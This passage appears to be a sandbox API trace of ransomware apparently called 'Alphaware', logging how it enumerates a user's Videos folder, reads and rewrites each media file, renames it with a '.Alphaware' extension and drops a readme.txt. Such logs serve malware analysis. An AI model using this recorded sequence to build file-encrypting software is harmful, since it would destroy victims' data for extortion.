cFileName="bC7JKZ.swf.Alphaware", cAlternateFileName="BC7JKZ~1.ALP")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b101bf0, ftCreationTime.dwHighDateTime=0x1d969e8, ftLastAccessTime.dwLowDateTime=0xe6a59110, ftLastAccessTime.dwHighDateTime=0x1d97603, ftLastWriteTime.dwLowDateTime=0x87345ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6534, dwReserved0=0x0, dwReserved1=0x0, cFileName="jlPj6J.flv.Alphaware", cAlternateFileName="JLPJ6J~1.ALP")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf85af2f0, ftCreationTime.dwHighDateTime=0x1d96c4a, ftLastAccessTime.dwLowDateTime=0x75a36f80, ftLastAccessTime.dwHighDateTime=0x1d97493, ftLastWriteTime.dwLowDateTime=0x8736c020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1320, dwReserved0=0x0, dwReserved1=0x0, cFileName="MADiRK5BENdO7pHH.flv.Alphaware", cAlternateFileName="MADIRK~1.ALP")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e3bf710, ftCreationTime.dwHighDateTime=0x1d96e1f, ftLastAccessTime.dwLowDateTime=0xc6dcea00, ftLastAccessTime.dwHighDateTime=0x1d970ad, ftLastWriteTime.dwLowDateTime=0x873b82e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ptfdx.mp4.Alphaware", cAlternateFileName="PTFDXM~1.ALP")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x872877e0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x872877e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x872877e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x872877e0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x872877e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x872877e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb41a2eb0, ftCreationTime.dwHighDateTime=0x1d974f3, ftLastAccessTime.dwLowDateTime=0x1259f070, ftLastAccessTime.dwHighDateTime=0x1d97583, ftLastWriteTime.dwLowDateTime=0x1259f070, ftLastWriteTime.dwHighDateTime=0x1d97583, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x111340a0, ftCreationTime.dwHighDateTime=0x1d97578, ftLastAccessTime.dwLowDateTime=0x62124b40, ftLastAccessTime.dwHighDateTime=0x1d975a5, ftLastWriteTime.dwLowDateTime=0x62124b40, ftLastWriteTime.dwHighDateTime=0x1d975a5, nFileSizeHigh=0x0, nFileSizeLow=0x18c3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="4iWuq2Z09OQUcI.flv", cAlternateFileName="4IWUQ2~1.FLV")) returned 1 [0089.019] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa580df80, ftCreationTime.dwHighDateTime=0x1d96827, ftLastAccessTime.dwLowDateTime=0x2231dd20, ftLastAccessTime.dwHighDateTime=0x1d96c35, ftLastWriteTime.dwLowDateTime=0x2231dd20, ftLastWriteTime.dwHighDateTime=0x1d96c35, nFileSizeHigh=0x0, nFileSizeLow=0x15fbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJTM1.flv", cAlternateFileName="")) returned 1 [0089.020] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba487400, ftCreationTime.dwHighDateTime=0x1d96e80, ftLastAccessTime.dwLowDateTime=0xcd5c120, ftLastAccessTime.dwHighDateTime=0x1d9715e, ftLastWriteTime.dwLowDateTime=0xcd5c120, ftLastWriteTime.dwHighDateTime=0x1d9715e, nFileSizeHigh=0x0, nFileSizeLow=0xb2e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BPvw70tznoS_6.avi", cAlternateFileName="BPVW70~1.AVI")) returned 1 [0089.020] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c35ab70, ftCreationTime.dwHighDateTime=0x1d967d2, ftLastAccessTime.dwLowDateTime=0xe3e16810, ftLastAccessTime.dwHighDateTime=0x1d9753f, ftLastWriteTime.dwLowDateTime=0xe3e16810, ftLastWriteTime.dwHighDateTime=0x1d9753f, nFileSizeHigh=0x0, nFileSizeLow=0x15030, dwReserved0=0x0, dwReserved1=0x0, cFileName="c4x.flv", cAlternateFileName="")) returned 1 [0089.020] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0089.020] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv", dwFileAttributes=0x80) returned 1 [0089.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv"), fInfoLevelId=0x0, lpFileInformation=0x254cb28 | out: lpFileInformation=0x254cb28*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x111340a0, ftCreationTime.dwHighDateTime=0x1d97578, ftLastAccessTime.dwLowDateTime=0x62124b40, ftLastAccessTime.dwHighDateTime=0x1d975a5, ftLastWriteTime.dwLowDateTime=0x62124b40, ftLastWriteTime.dwHighDateTime=0x1d975a5, nFileSizeHigh=0x0, nFileSizeLow=0x18c3f)) returned 1 [0089.021] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.021] ReadFile (in: hFile=0x250, lpBuffer=0x1284a9b0, nNumberOfBytesToRead=0x18c3f, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x1284a9b0*, lpNumberOfBytesRead=0x23e9f8*=0x18c3f, lpOverlapped=0x0) returned 1 [0089.098] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.105] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x111340a0, ftCreationTime.dwHighDateTime=0x1d97578, ftLastAccessTime.dwLowDateTime=0x62124b40, ftLastAccessTime.dwHighDateTime=0x1d975a5, ftLastWriteTime.dwLowDateTime=0x874e8de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21120)) returned 1 [0089.105] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\4iWuq2Z09OQUcI.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\4iwuq2z09oquci.flv.alphaware")) returned 1 [0089.106] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.112] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv", dwFileAttributes=0x80) returned 1 [0089.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv"), fInfoLevelId=0x0, lpFileInformation=0x25ce2c0 | out: lpFileInformation=0x25ce2c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xa580df80, ftCreationTime.dwHighDateTime=0x1d96827, ftLastAccessTime.dwLowDateTime=0x2231dd20, ftLastAccessTime.dwHighDateTime=0x1d96c35, ftLastWriteTime.dwLowDateTime=0x2231dd20, ftLastWriteTime.dwHighDateTime=0x1d96c35, nFileSizeHigh=0x0, nFileSizeLow=0x15fbb)) returned 1 [0089.113] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.113] ReadFile (in: hFile=0x250, lpBuffer=0x12a3c538, nNumberOfBytesToRead=0x15fbb, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x12a3c538*, lpNumberOfBytesRead=0x23e9f8*=0x15fbb, lpOverlapped=0x0) returned 1 [0089.143] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa580df80, ftCreationTime.dwHighDateTime=0x1d96827, ftLastAccessTime.dwLowDateTime=0x2231dd20, ftLastAccessTime.dwHighDateTime=0x1d96c35, ftLastWriteTime.dwLowDateTime=0x8755b200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d5c8)) returned 1 [0089.148] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\bJTM1.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bjtm1.flv.alphaware")) returned 1 [0089.149] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi", dwFileAttributes=0x80) returned 1 [0089.150] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi"), fInfoLevelId=0x0, lpFileInformation=0x244ca08 | out: lpFileInformation=0x244ca08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xba487400, ftCreationTime.dwHighDateTime=0x1d96e80, ftLastAccessTime.dwLowDateTime=0xcd5c120, ftLastAccessTime.dwHighDateTime=0x1d9715e, ftLastWriteTime.dwLowDateTime=0xcd5c120, ftLastWriteTime.dwHighDateTime=0x1d9715e, nFileSizeHigh=0x0, nFileSizeLow=0xb2e9)) returned 1 [0089.150] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.150] ReadFile (in: hFile=0x250, lpBuffer=0x244ccc0, nNumberOfBytesToRead=0xb2e9, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x244ccc0*, lpNumberOfBytesRead=0x23e9f8*=0xb2e9, lpOverlapped=0x0) returned 1 [0089.185] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba487400, ftCreationTime.dwHighDateTime=0x1d96e80, ftLastAccessTime.dwLowDateTime=0xcd5c120, ftLastAccessTime.dwHighDateTime=0x1d9715e, ftLastWriteTime.dwLowDateTime=0x875f3780, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60)) returned 1 [0089.205] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\BPvw70tznoS_6.avi.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\bpvw70tznos_6.avi.alphaware")) returned 1 [0089.206] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv", dwFileAttributes=0x80) returned 1 [0089.206] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv"), fInfoLevelId=0x0, lpFileInformation=0x23e17a0 | out: lpFileInformation=0x23e17a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6c35ab70, ftCreationTime.dwHighDateTime=0x1d967d2, ftLastAccessTime.dwLowDateTime=0xe3e16810, ftLastAccessTime.dwHighDateTime=0x1d9753f, ftLastWriteTime.dwLowDateTime=0xe3e16810, ftLastWriteTime.dwHighDateTime=0x1d9753f, nFileSizeHigh=0x0, nFileSizeLow=0x15030)) returned 1 [0089.207] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0089.207] ReadFile (in: hFile=0x250, lpBuffer=0x1265eaa8, nNumberOfBytesToRead=0x15030, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x1265eaa8*, lpNumberOfBytesRead=0x23e9f8*=0x15030, lpOverlapped=0x0) returned 1 [0089.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0089.259] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c35ab70, ftCreationTime.dwHighDateTime=0x1d967d2, ftLastAccessTime.dwLowDateTime=0xe3e16810, ftLastAccessTime.dwHighDateTime=0x1d9753f, ftLastWriteTime.dwLowDateTime=0x87665ba0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c120)) returned 1 [0089.259] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\4_p930HVcZ_\\c4x.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\4_p930hvcz_\\c4x.flv.alphaware")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb41a2eb0, ftCreationTime.dwHighDateTime=0x1d974f3, ftLastAccessTime.dwLowDateTime=0x87665ba0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x87665ba0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x111340a0, ftCreationTime.dwHighDateTime=0x1d97578, ftLastAccessTime.dwLowDateTime=0x62124b40, ftLastAccessTime.dwHighDateTime=0x1d975a5, ftLastWriteTime.dwLowDateTime=0x874e8de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21120, dwReserved0=0x0, dwReserved1=0x0, cFileName="4iWuq2Z09OQUcI.flv.Alphaware", cAlternateFileName="4IWUQ2~1.ALP")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa580df80, ftCreationTime.dwHighDateTime=0x1d96827, ftLastAccessTime.dwLowDateTime=0x2231dd20, ftLastAccessTime.dwHighDateTime=0x1d96c35, ftLastWriteTime.dwLowDateTime=0x8755b200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJTM1.flv.Alphaware", cAlternateFileName="BJTM1F~1.ALP")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba487400, ftCreationTime.dwHighDateTime=0x1d96e80, ftLastAccessTime.dwLowDateTime=0xcd5c120, ftLastAccessTime.dwHighDateTime=0x1d9715e, ftLastWriteTime.dwLowDateTime=0x875f3780, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xef60, dwReserved0=0x0, dwReserved1=0x0, cFileName="BPvw70tznoS_6.avi.Alphaware", cAlternateFileName="BPVW70~1.ALP")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c35ab70, ftCreationTime.dwHighDateTime=0x1d967d2, ftLastAccessTime.dwLowDateTime=0xe3e16810, ftLastAccessTime.dwHighDateTime=0x1d9753f, ftLastWriteTime.dwLowDateTime=0x87665ba0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c120, dwReserved0=0x0, dwReserved1=0x0, cFileName="c4x.flv.Alphaware", cAlternateFileName="C4XFLV~1.ALP")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x874e8de0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x874e8de0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x874e8de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x874e8de0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x874e8de0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x874e8de0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0089.260] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65e9cc30, ftCreationTime.dwHighDateTime=0x1d975bd, ftLastAccessTime.dwLowDateTime=0x5bc10920, ftLastAccessTime.dwHighDateTime=0x1d9767c, ftLastWriteTime.dwLowDateTime=0x5bc10920, ftLastWriteTime.dwHighDateTime=0x1d9767c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc15bca60, ftCreationTime.dwHighDateTime=0x1d96987, ftLastAccessTime.dwLowDateTime=0xce25a650, ftLastAccessTime.dwHighDateTime=0x1d974ca, ftLastWriteTime.dwLowDateTime=0xce25a650, ftLastWriteTime.dwHighDateTime=0x1d974ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.261] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fd4880, ftCreationTime.dwHighDateTime=0x1d96ec3, ftLastAccessTime.dwLowDateTime=0x5b3435c0, 